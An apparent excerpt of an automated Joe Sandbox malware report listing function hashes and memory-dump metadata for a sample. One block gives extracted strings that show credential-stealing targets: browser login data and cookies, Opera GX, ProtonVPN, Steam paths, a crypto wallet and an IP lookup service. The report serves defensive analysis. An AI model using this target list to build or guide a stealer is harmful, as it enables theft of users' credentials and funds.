                                                                                                                                              • Instruction ID: 7176e74ffe483eadd50eb7e4452bae4631f29a056fe846e9fd462969055d3d09
                                                                                                                                              • Opcode Fuzzy Hash: 2a24d15edc41cba16cb0aa82fbff885579414fd9d03849220ffc6bf3e1c69da1
                                                                                                                                              • Instruction Fuzzy Hash: 5A418AB5700606DFCB15CF59C49096ABBF2FF89310B15C999E6999B3A2D730F801CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 26a712ab1658cba756d7138d3c787af8bfc2c93ffd9c0522bd4398c0d4d922b2
                                                                                                                                              • Instruction ID: 21406fcb276e19b2ee45c6f64fcb022d43768da5c4b2d9406224ead4057b4d08
                                                                                                                                              • Opcode Fuzzy Hash: 26a712ab1658cba756d7138d3c787af8bfc2c93ffd9c0522bd4398c0d4d922b2
                                                                                                                                              • Instruction Fuzzy Hash: A431D3B57086958FCB06CF78D86496A7FB5AF8621070941EAE546CB2F3DB30CC05C7A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fd949e2c177599a8f1d91debc8a824c7413fb3482febc1fe8a8c0f4488b2fd00
                                                                                                                                              • Instruction ID: 659cb2eebfe2f6860fed959e74779d4d85fb536cf37315fcb1769500111dce3d
                                                                                                                                              • Opcode Fuzzy Hash: fd949e2c177599a8f1d91debc8a824c7413fb3482febc1fe8a8c0f4488b2fd00
                                                                                                                                              • Instruction Fuzzy Hash: C33178B5B002159FCB15DF78E89496E7BB6FF89300B508068E906CB391DB31ED41CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ba6f817c74be45aa8812568a55012dd00e678b29ad47975c896a79030f920800
                                                                                                                                              • Instruction ID: 7034fd7e7e7dc0b0f58dae055b26e1d1b98617668637ba9240fa987e3e409338
                                                                                                                                              • Opcode Fuzzy Hash: ba6f817c74be45aa8812568a55012dd00e678b29ad47975c896a79030f920800
                                                                                                                                              • Instruction Fuzzy Hash: AF215935B001149FCB54CF68D994EADBBB2FF88714F1180A9FA059B361DA31ED40CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 331eb96a088bed29c93056ede77570bddd2ee4e305f78198c1b0c474ced3bdb1
                                                                                                                                              • Instruction ID: f1a8fa1bbf23df0a43a4fc5d1a0d590f8384910c41e5ce47f8126520ad8ed14e
                                                                                                                                              • Opcode Fuzzy Hash: 331eb96a088bed29c93056ede77570bddd2ee4e305f78198c1b0c474ced3bdb1
                                                                                                                                              • Instruction Fuzzy Hash: E5214B71504200EFCF15DF94D8C0F2ABFA5FB88314F64C6A9EA490B656C336D416CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 86d79e23708cda06e04ce83d049256756a65a5be309486f78b923d56f985a052
                                                                                                                                              • Instruction ID: d764b620e8f3ebf5c997c195cc01c03d1cc31752a04ad26e37d0cc08d4ce84d5
                                                                                                                                              • Opcode Fuzzy Hash: 86d79e23708cda06e04ce83d049256756a65a5be309486f78b923d56f985a052
                                                                                                                                              • Instruction Fuzzy Hash: 042104B1504204EFDB05CF58D5C0B6AFBA5FB8431CF24C9ADE98A4B252C73AD846CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80ea61c3e3f2c3b7073d84d574dbac131c0465c6b420b910e8a16f0356f13abe
                                                                                                                                              • Instruction ID: 791574aa816182dab53a7f88ee2bd10ca83b83c4f8e7feae06b17d7723d43ce7
                                                                                                                                              • Opcode Fuzzy Hash: 80ea61c3e3f2c3b7073d84d574dbac131c0465c6b420b910e8a16f0356f13abe
                                                                                                                                              • Instruction Fuzzy Hash: 6F2129B5605200DFDB05DF58D5C0B6AFBA5FB84718F24C569D8894B247C33AD406CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e665eb321987460602487e7ebe42fa3e718f0fdaf3d56ca57d8d9e5b986607fd
                                                                                                                                              • Instruction ID: eb1019883d61371711ee34b244b0c6800eb68c1484237273460c1d026e6ba0e3
                                                                                                                                              • Opcode Fuzzy Hash: e665eb321987460602487e7ebe42fa3e718f0fdaf3d56ca57d8d9e5b986607fd
                                                                                                                                              • Instruction Fuzzy Hash: A7216D75B0011ACFCB15DF68D59486EB7F6EF882107148079EA06DB3A0DB31DC02CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: de0cf2376248f45887013bd1fed1249b49676a212c9b852acb2345d75886e5be
                                                                                                                                              • Instruction ID: b17d754476b88dd7b45ae89e62123ce248dff1144a8ec69270ac493b65060a0d
                                                                                                                                              • Opcode Fuzzy Hash: de0cf2376248f45887013bd1fed1249b49676a212c9b852acb2345d75886e5be
                                                                                                                                              • Instruction Fuzzy Hash: 9C1142B6B00215CFDB25AFB5D8586EEBBB5EB88220F040029D506E3394DF755C45CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7a08ecef493c7b4b9bbe109ea3f6fa503c7a8ce734f1f191171b5c8b16ba080d
                                                                                                                                              • Instruction ID: 084795512d7b6dacc38ceae8eafe5d8695531b5403d0b0a39c9b6686f9dda485
                                                                                                                                              • Opcode Fuzzy Hash: 7a08ecef493c7b4b9bbe109ea3f6fa503c7a8ce734f1f191171b5c8b16ba080d
                                                                                                                                              • Instruction Fuzzy Hash: 561136B27053409FD711CB6CD844F92BBE0DF81320F0585AAE254CF6B2D7A1E846DB01
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                                                                                                                                              • Instruction ID: 15be4f7c41743e943ed08929b2f5e9f4c0d8fadf971d72b4eccdfd695f7a749f
                                                                                                                                              • Opcode Fuzzy Hash: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                                                                                                                                              • Instruction Fuzzy Hash: BF21DF76404280DFCF16CF84D9C0B16BFB2FB88314F2486A9E9490B657C33AE466CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                              • Instruction ID: d1d7789fc160b46221997e81e0c1ee33e16ac0d5ab2574f8f759c147a135a023
                                                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                              • Instruction Fuzzy Hash: A911D075504244CFDB02CF58D5C4B15FFA1FB84318F24C6AAD9894B656C33AD44ACB51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                                                                                                                                              • Instruction ID: 1437560522de67c11a5c0b72fdde6ec3883334eee4ec0b59c9c5a11f5ac5a38e
                                                                                                                                              • Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                                                                                                                                              • Instruction Fuzzy Hash: BC11E275505280CFDB12CF14D5C0B59FFA1FB84728F24C6AAD8894B647C33AD40ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8110f0c2ded7917ef7d983dcf351d5d33c7cbe1d6058db041bd5cf83eee546fa
                                                                                                                                              • Instruction ID: 31390e27a13a3ef1a4eaf7061c321695bbdec2b5433d5acb3fbf939d1e4fbc36
                                                                                                                                              • Opcode Fuzzy Hash: 8110f0c2ded7917ef7d983dcf351d5d33c7cbe1d6058db041bd5cf83eee546fa
                                                                                                                                              • Instruction Fuzzy Hash: 52012B72508300DAE7108BD9CDC0B67FFD8DF40360F58C45AED894A693C6789840C771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9a59595c37afe749094b87637ceb58ae6ea38ecaee8c019f33d11af9187bca6c
                                                                                                                                              • Instruction ID: 80191b06994ccfe95acc49c85d507ce62883145d49d40495ab3d081e1462244e
                                                                                                                                              • Opcode Fuzzy Hash: 9a59595c37afe749094b87637ceb58ae6ea38ecaee8c019f33d11af9187bca6c
                                                                                                                                              • Instruction Fuzzy Hash: BE01D1F0700302CFCB2ADA75A414533B7F6BF81209B148E2DD6828AA94DB71E480CB80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 76756af52a59c375d9204d4215fd81c1eec70891421b61a70aacce18534a1e68
                                                                                                                                              • Instruction ID: 5c57265f100b929bd495976f62e7bb1e5627ab62bbc0607ee71b245f523c6a6e
                                                                                                                                              • Opcode Fuzzy Hash: 76756af52a59c375d9204d4215fd81c1eec70891421b61a70aacce18534a1e68
                                                                                                                                              • Instruction Fuzzy Hash: C0F0F6F17143028FC7268A21E811A7277B5AF81609B458A6DD5C28F5D1D775E482CFD2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: aa1335543407398bb0cf426aa11133b80a79ddb443e10473f965b3f50400ef41
                                                                                                                                              • Instruction ID: 16f2f560c31a57a597ba8772f17ebe88171cbdfdb5882a2f09eb0612c49bcb20
                                                                                                                                              • Opcode Fuzzy Hash: aa1335543407398bb0cf426aa11133b80a79ddb443e10473f965b3f50400ef41
                                                                                                                                              • Instruction Fuzzy Hash: C4F0F6712003055FCB228A34DD44F917FA5AB86735F054566E2288F1F2D7B1D849A780
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a914a7018411910b5a9404a0f65286ee87a2ea36aff920ff3b3d28c9de2d85e2
                                                                                                                                              • Instruction ID: f5530f65cf45328ba594617e817f1784e95cf14688fcb59782b0bd5f4cc5174d
                                                                                                                                              • Opcode Fuzzy Hash: a914a7018411910b5a9404a0f65286ee87a2ea36aff920ff3b3d28c9de2d85e2
                                                                                                                                              • Instruction Fuzzy Hash: 8BF0CD72404344AEE7208A4AC9C4B62FFD8EB80724F18C09AED484E683C278A840CBB0
                                                                                                                                              Strings
                                                                                                                                              • Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt, xrefs: 071F0A08
                                                                                                                                              • Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI, xrefs: 071F0862
                                                                                                                                              • %USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN, xrefs: 071F0A42
                                                                                                                                              • Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S, xrefs: 071F08A5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN$Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI$Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt$Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S
                                                                                                                                              • API String ID: 0-1501812523
                                                                                                                                              • Opcode ID: a597acf52c8dc91b053d2db866e2b8783875bc72c6c62fb3d276465bf5510419
                                                                                                                                              • Instruction ID: cb6ffdc212ff8d3052625a7090b31a5a3b6033dbcd4ac2a58d09e39a12d679f6
                                                                                                                                              • Opcode Fuzzy Hash: a597acf52c8dc91b053d2db866e2b8783875bc72c6c62fb3d276465bf5510419
                                                                                                                                              • Instruction Fuzzy Hash: B8E1B070A0071A8BDB14EF74C8507AEB7B2BF88300F50C569D949AB395EF749D85CB90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                                              • API String ID: 0-3929485403
                                                                                                                                              • Opcode ID: a4b3e2ff1287b118d0b09ed6d917789f3f1f655052a05d626960a1ced0edc03c
                                                                                                                                              • Instruction ID: 548ed5d42c540d6a16aabec85f254091202217c946cb42b51f6f5f33c52475be
                                                                                                                                              • Opcode Fuzzy Hash: a4b3e2ff1287b118d0b09ed6d917789f3f1f655052a05d626960a1ced0edc03c
                                                                                                                                              • Instruction Fuzzy Hash: D1B1E334B0025A8FDB54DB69C854ABEBBF6BF88304F14805AE546DB7A1DB70DC81CB91